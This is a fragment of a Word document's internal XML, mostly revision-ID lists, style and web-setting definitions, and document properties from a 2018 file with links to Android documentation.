    <w:rsid w:val="00786F2C"/>
    <w:rsid w:val="00790D27"/>
    <w:rsid w:val="0079359F"/>
    <w:rsid w:val="007936DF"/>
    <w:rsid w:val="0079545A"/>
    <w:rsid w:val="00796E99"/>
    <w:rsid w:val="007971AC"/>
    <w:rsid w:val="00797E85"/>
    <w:rsid w:val="007A16E3"/>
    <w:rsid w:val="007A21CC"/>
    <w:rsid w:val="007A3194"/>
    <w:rsid w:val="007A6E16"/>
    <w:rsid w:val="007B1617"/>
    <w:rsid w:val="007B19B7"/>
    <w:rsid w:val="007B1DE3"/>
    <w:rsid w:val="007C15DB"/>
    <w:rsid w:val="007C24DD"/>
    <w:rsid w:val="007C2549"/>
    <w:rsid w:val="007C2FF2"/>
    <w:rsid w:val="007C37E2"/>
    <w:rsid w:val="007C3D7E"/>
    <w:rsid w:val="007C5222"/>
    <w:rsid w:val="007C686E"/>
    <w:rsid w:val="007C6B16"/>
    <w:rsid w:val="007E236D"/>
    <w:rsid w:val="007E2A52"/>
    <w:rsid w:val="007E32C5"/>
    <w:rsid w:val="007E42B9"/>
    <w:rsid w:val="007E53BC"/>
    <w:rsid w:val="007F2EC2"/>
    <w:rsid w:val="007F3283"/>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6C89"/>
    <w:rsid w:val="00825252"/>
    <w:rsid w:val="00826FA6"/>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4F4"/>
    <w:rsid w:val="008653E0"/>
    <w:rsid w:val="0086568B"/>
    <w:rsid w:val="008706CA"/>
    <w:rsid w:val="008708BA"/>
    <w:rsid w:val="00871A61"/>
    <w:rsid w:val="00872FE1"/>
    <w:rsid w:val="00873C25"/>
    <w:rsid w:val="00873D57"/>
    <w:rsid w:val="00876D09"/>
    <w:rsid w:val="00880BFE"/>
    <w:rsid w:val="0088134E"/>
    <w:rsid w:val="008814D7"/>
    <w:rsid w:val="00881D19"/>
    <w:rsid w:val="00882FE1"/>
    <w:rsid w:val="00886608"/>
    <w:rsid w:val="00886864"/>
    <w:rsid w:val="00890404"/>
    <w:rsid w:val="00892179"/>
    <w:rsid w:val="00893756"/>
    <w:rsid w:val="00897CEF"/>
    <w:rsid w:val="008A7679"/>
    <w:rsid w:val="008B0E41"/>
    <w:rsid w:val="008B0F73"/>
    <w:rsid w:val="008B0FEE"/>
    <w:rsid w:val="008B15DE"/>
    <w:rsid w:val="008B7421"/>
    <w:rsid w:val="008C1267"/>
    <w:rsid w:val="008C25FA"/>
    <w:rsid w:val="008C4584"/>
    <w:rsid w:val="008C4E96"/>
    <w:rsid w:val="008D0031"/>
    <w:rsid w:val="008D0DA7"/>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7E7"/>
    <w:rsid w:val="00913AA6"/>
    <w:rsid w:val="00915A7A"/>
    <w:rsid w:val="00920C97"/>
    <w:rsid w:val="00922116"/>
    <w:rsid w:val="009222F2"/>
    <w:rsid w:val="00922D3A"/>
    <w:rsid w:val="0092374E"/>
    <w:rsid w:val="00923AFA"/>
    <w:rsid w:val="00923F2B"/>
    <w:rsid w:val="00927E44"/>
    <w:rsid w:val="009303D9"/>
    <w:rsid w:val="00940CE6"/>
    <w:rsid w:val="00941435"/>
    <w:rsid w:val="00945140"/>
    <w:rsid w:val="00945E3C"/>
    <w:rsid w:val="00946F9D"/>
    <w:rsid w:val="00951AA2"/>
    <w:rsid w:val="009524DC"/>
    <w:rsid w:val="009527D5"/>
    <w:rsid w:val="0095552E"/>
    <w:rsid w:val="009564A6"/>
    <w:rsid w:val="009575ED"/>
    <w:rsid w:val="00957C7B"/>
    <w:rsid w:val="00961B69"/>
    <w:rsid w:val="009643D4"/>
    <w:rsid w:val="0096576E"/>
    <w:rsid w:val="00965BB7"/>
    <w:rsid w:val="00965BF8"/>
    <w:rsid w:val="009670E8"/>
    <w:rsid w:val="00967E96"/>
    <w:rsid w:val="00972EE1"/>
    <w:rsid w:val="00973504"/>
    <w:rsid w:val="00976C2A"/>
    <w:rsid w:val="00977084"/>
    <w:rsid w:val="0097723F"/>
    <w:rsid w:val="009822C2"/>
    <w:rsid w:val="00984592"/>
    <w:rsid w:val="009845C6"/>
    <w:rsid w:val="00985ED5"/>
    <w:rsid w:val="009872F6"/>
    <w:rsid w:val="009915E0"/>
    <w:rsid w:val="009915F9"/>
    <w:rsid w:val="0099445A"/>
    <w:rsid w:val="009A22D9"/>
    <w:rsid w:val="009A33B9"/>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E3DFD"/>
    <w:rsid w:val="009E59E2"/>
    <w:rsid w:val="009E6879"/>
    <w:rsid w:val="009E699B"/>
    <w:rsid w:val="009E7BEE"/>
    <w:rsid w:val="009F0F1F"/>
    <w:rsid w:val="009F1CEF"/>
    <w:rsid w:val="009F20C0"/>
    <w:rsid w:val="009F4370"/>
    <w:rsid w:val="009F453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30A30"/>
    <w:rsid w:val="00A32A44"/>
    <w:rsid w:val="00A3418B"/>
    <w:rsid w:val="00A368C9"/>
    <w:rsid w:val="00A40FC8"/>
    <w:rsid w:val="00A42B9F"/>
    <w:rsid w:val="00A43DE4"/>
    <w:rsid w:val="00A500C8"/>
    <w:rsid w:val="00A506A7"/>
    <w:rsid w:val="00A53FE4"/>
    <w:rsid w:val="00A55A5B"/>
    <w:rsid w:val="00A55D18"/>
    <w:rsid w:val="00A67500"/>
    <w:rsid w:val="00A67DEB"/>
    <w:rsid w:val="00A706A6"/>
    <w:rsid w:val="00A73585"/>
    <w:rsid w:val="00A7470D"/>
    <w:rsid w:val="00A7573C"/>
    <w:rsid w:val="00A763E9"/>
    <w:rsid w:val="00A779D1"/>
    <w:rsid w:val="00A80FA6"/>
    <w:rsid w:val="00A81182"/>
    <w:rsid w:val="00A812C6"/>
    <w:rsid w:val="00A83E21"/>
    <w:rsid w:val="00A8407F"/>
    <w:rsid w:val="00A93C8D"/>
    <w:rsid w:val="00A945E4"/>
    <w:rsid w:val="00A94BD2"/>
    <w:rsid w:val="00A9551F"/>
    <w:rsid w:val="00A95D89"/>
    <w:rsid w:val="00A9643D"/>
    <w:rsid w:val="00A97689"/>
    <w:rsid w:val="00AA1F97"/>
    <w:rsid w:val="00AA5A28"/>
    <w:rsid w:val="00AA5BF3"/>
    <w:rsid w:val="00AA5CAB"/>
    <w:rsid w:val="00AA60D7"/>
    <w:rsid w:val="00AA6319"/>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C6A"/>
    <w:rsid w:val="00AD7EAC"/>
    <w:rsid w:val="00AE0DC5"/>
    <w:rsid w:val="00AE0F0C"/>
    <w:rsid w:val="00AE6408"/>
    <w:rsid w:val="00AE6422"/>
    <w:rsid w:val="00AE7926"/>
    <w:rsid w:val="00AE7B13"/>
    <w:rsid w:val="00AF0996"/>
    <w:rsid w:val="00AF09D7"/>
    <w:rsid w:val="00AF1FA5"/>
    <w:rsid w:val="00AF2896"/>
    <w:rsid w:val="00AF62F6"/>
    <w:rsid w:val="00B02DBA"/>
    <w:rsid w:val="00B058B6"/>
    <w:rsid w:val="00B06099"/>
    <w:rsid w:val="00B065EC"/>
    <w:rsid w:val="00B11034"/>
    <w:rsid w:val="00B11A60"/>
    <w:rsid w:val="00B12579"/>
    <w:rsid w:val="00B12C79"/>
    <w:rsid w:val="00B13B7A"/>
    <w:rsid w:val="00B14176"/>
    <w:rsid w:val="00B14F14"/>
    <w:rsid w:val="00B17FF4"/>
    <w:rsid w:val="00B201BD"/>
    <w:rsid w:val="00B20715"/>
    <w:rsid w:val="00B22F6E"/>
    <w:rsid w:val="00B2301B"/>
    <w:rsid w:val="00B23584"/>
    <w:rsid w:val="00B236CA"/>
    <w:rsid w:val="00B2421E"/>
    <w:rsid w:val="00B2562C"/>
    <w:rsid w:val="00B25729"/>
    <w:rsid w:val="00B3269B"/>
    <w:rsid w:val="00B353E5"/>
    <w:rsid w:val="00B37731"/>
    <w:rsid w:val="00B40556"/>
    <w:rsid w:val="00B412EA"/>
    <w:rsid w:val="00B417E7"/>
    <w:rsid w:val="00B43B5A"/>
    <w:rsid w:val="00B4639A"/>
    <w:rsid w:val="00B50CEF"/>
    <w:rsid w:val="00B51389"/>
    <w:rsid w:val="00B53F85"/>
    <w:rsid w:val="00B575AC"/>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2A3"/>
    <w:rsid w:val="00B958A3"/>
    <w:rsid w:val="00B9633E"/>
    <w:rsid w:val="00B97EED"/>
    <w:rsid w:val="00B97F8E"/>
    <w:rsid w:val="00BA0CEC"/>
    <w:rsid w:val="00BA37AB"/>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76C0"/>
    <w:rsid w:val="00BD49B4"/>
    <w:rsid w:val="00BD6742"/>
    <w:rsid w:val="00BD7B30"/>
    <w:rsid w:val="00BD7C77"/>
    <w:rsid w:val="00BE28A8"/>
    <w:rsid w:val="00BE36C5"/>
    <w:rsid w:val="00BE3948"/>
    <w:rsid w:val="00BE6FBE"/>
    <w:rsid w:val="00BF0587"/>
    <w:rsid w:val="00BF17D0"/>
    <w:rsid w:val="00BF3F7E"/>
    <w:rsid w:val="00BF4853"/>
    <w:rsid w:val="00BF4944"/>
    <w:rsid w:val="00BF4F6A"/>
    <w:rsid w:val="00BF56F8"/>
    <w:rsid w:val="00BF5B3E"/>
    <w:rsid w:val="00BF75BA"/>
    <w:rsid w:val="00BF7F60"/>
    <w:rsid w:val="00C008D6"/>
    <w:rsid w:val="00C01CF8"/>
    <w:rsid w:val="00C025E2"/>
    <w:rsid w:val="00C05FB3"/>
    <w:rsid w:val="00C07180"/>
    <w:rsid w:val="00C07A43"/>
    <w:rsid w:val="00C113FA"/>
    <w:rsid w:val="00C121F0"/>
    <w:rsid w:val="00C14842"/>
    <w:rsid w:val="00C1496F"/>
    <w:rsid w:val="00C14972"/>
    <w:rsid w:val="00C14EC4"/>
    <w:rsid w:val="00C150CA"/>
    <w:rsid w:val="00C1739F"/>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2616"/>
    <w:rsid w:val="00C62A90"/>
    <w:rsid w:val="00C62D21"/>
    <w:rsid w:val="00C70481"/>
    <w:rsid w:val="00C70C29"/>
    <w:rsid w:val="00C70F52"/>
    <w:rsid w:val="00C71DB4"/>
    <w:rsid w:val="00C71F72"/>
    <w:rsid w:val="00C7543B"/>
    <w:rsid w:val="00C769B9"/>
    <w:rsid w:val="00C76D73"/>
    <w:rsid w:val="00C777EF"/>
    <w:rsid w:val="00C85868"/>
    <w:rsid w:val="00C86EB3"/>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791"/>
    <w:rsid w:val="00CC2926"/>
    <w:rsid w:val="00CC35B2"/>
    <w:rsid w:val="00CC49F7"/>
    <w:rsid w:val="00CC4C74"/>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4145"/>
    <w:rsid w:val="00D07164"/>
    <w:rsid w:val="00D1063C"/>
    <w:rsid w:val="00D120C7"/>
    <w:rsid w:val="00D1238F"/>
    <w:rsid w:val="00D1345E"/>
    <w:rsid w:val="00D144C7"/>
    <w:rsid w:val="00D15C52"/>
    <w:rsid w:val="00D15FC3"/>
    <w:rsid w:val="00D22DBC"/>
    <w:rsid w:val="00D23112"/>
    <w:rsid w:val="00D239D4"/>
    <w:rsid w:val="00D32CA3"/>
    <w:rsid w:val="00D332E4"/>
    <w:rsid w:val="00D34177"/>
    <w:rsid w:val="00D34F77"/>
    <w:rsid w:val="00D35B40"/>
    <w:rsid w:val="00D362A3"/>
    <w:rsid w:val="00D37594"/>
    <w:rsid w:val="00D413F3"/>
    <w:rsid w:val="00D43F03"/>
    <w:rsid w:val="00D44251"/>
    <w:rsid w:val="00D457A1"/>
    <w:rsid w:val="00D471EB"/>
    <w:rsid w:val="00D50A43"/>
    <w:rsid w:val="00D51587"/>
    <w:rsid w:val="00D534D8"/>
    <w:rsid w:val="00D5419B"/>
    <w:rsid w:val="00D60A9C"/>
    <w:rsid w:val="00D61359"/>
    <w:rsid w:val="00D63184"/>
    <w:rsid w:val="00D67280"/>
    <w:rsid w:val="00D71B33"/>
    <w:rsid w:val="00D71C17"/>
    <w:rsid w:val="00D72C98"/>
    <w:rsid w:val="00D7773D"/>
    <w:rsid w:val="00D80656"/>
    <w:rsid w:val="00D832A0"/>
    <w:rsid w:val="00D835A0"/>
    <w:rsid w:val="00D84162"/>
    <w:rsid w:val="00D84771"/>
    <w:rsid w:val="00D84CAA"/>
    <w:rsid w:val="00D870E3"/>
    <w:rsid w:val="00D90395"/>
    <w:rsid w:val="00D90652"/>
    <w:rsid w:val="00D946C0"/>
    <w:rsid w:val="00D94E7F"/>
    <w:rsid w:val="00D96209"/>
    <w:rsid w:val="00DA2E9B"/>
    <w:rsid w:val="00DA2FB7"/>
    <w:rsid w:val="00DA3388"/>
    <w:rsid w:val="00DA40D7"/>
    <w:rsid w:val="00DA5111"/>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5B9F"/>
    <w:rsid w:val="00DD78F3"/>
    <w:rsid w:val="00DD7B8D"/>
    <w:rsid w:val="00DE608D"/>
    <w:rsid w:val="00DE7D4F"/>
    <w:rsid w:val="00DF0FBC"/>
    <w:rsid w:val="00DF10DB"/>
    <w:rsid w:val="00DF161B"/>
    <w:rsid w:val="00DF46A9"/>
    <w:rsid w:val="00E002FE"/>
    <w:rsid w:val="00E03BFB"/>
    <w:rsid w:val="00E05F87"/>
    <w:rsid w:val="00E06D3B"/>
    <w:rsid w:val="00E1054E"/>
    <w:rsid w:val="00E109A9"/>
    <w:rsid w:val="00E112BD"/>
    <w:rsid w:val="00E11D26"/>
    <w:rsid w:val="00E13314"/>
    <w:rsid w:val="00E161E0"/>
    <w:rsid w:val="00E16715"/>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5BBE"/>
    <w:rsid w:val="00E75C7A"/>
    <w:rsid w:val="00E82E75"/>
    <w:rsid w:val="00E90798"/>
    <w:rsid w:val="00E9457B"/>
    <w:rsid w:val="00E95C8D"/>
    <w:rsid w:val="00E961BA"/>
    <w:rsid w:val="00E96270"/>
    <w:rsid w:val="00E96D38"/>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6C09"/>
    <w:rsid w:val="00ED6EB9"/>
    <w:rsid w:val="00ED6FCF"/>
    <w:rsid w:val="00EE40D0"/>
    <w:rsid w:val="00EF03BD"/>
    <w:rsid w:val="00EF1ACD"/>
    <w:rsid w:val="00EF357F"/>
    <w:rsid w:val="00EF3B1A"/>
    <w:rsid w:val="00EF77F4"/>
    <w:rsid w:val="00EF7F80"/>
    <w:rsid w:val="00F01BF3"/>
    <w:rsid w:val="00F0495B"/>
    <w:rsid w:val="00F101E4"/>
    <w:rsid w:val="00F110CC"/>
    <w:rsid w:val="00F14234"/>
    <w:rsid w:val="00F147C1"/>
    <w:rsid w:val="00F17D5D"/>
    <w:rsid w:val="00F20C3E"/>
    <w:rsid w:val="00F21236"/>
    <w:rsid w:val="00F271A1"/>
    <w:rsid w:val="00F35A6F"/>
    <w:rsid w:val="00F364D6"/>
    <w:rsid w:val="00F406F2"/>
    <w:rsid w:val="00F4316B"/>
    <w:rsid w:val="00F45A59"/>
    <w:rsid w:val="00F53C46"/>
    <w:rsid w:val="00F542E0"/>
    <w:rsid w:val="00F55EF0"/>
    <w:rsid w:val="00F57041"/>
    <w:rsid w:val="00F57EBF"/>
    <w:rsid w:val="00F6108B"/>
    <w:rsid w:val="00F61746"/>
    <w:rsid w:val="00F64AB5"/>
    <w:rsid w:val="00F741B2"/>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8D4F5E-F9EC-4468-8302-00045A3C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paragraph" w:styleId="aa">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CC2926"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00D1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2901">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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0327286">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12048408">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43912324">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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770668128">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25188493">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137718757">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1245184524">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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442190284">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582905246">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694765186">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reference/android/content/BroadcastReceiv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open.com/lib/view/open135029146697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49498-6462-436A-AA14-7DFDD924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408</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>28</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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u Zonghua</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-16T12:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-16T12:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>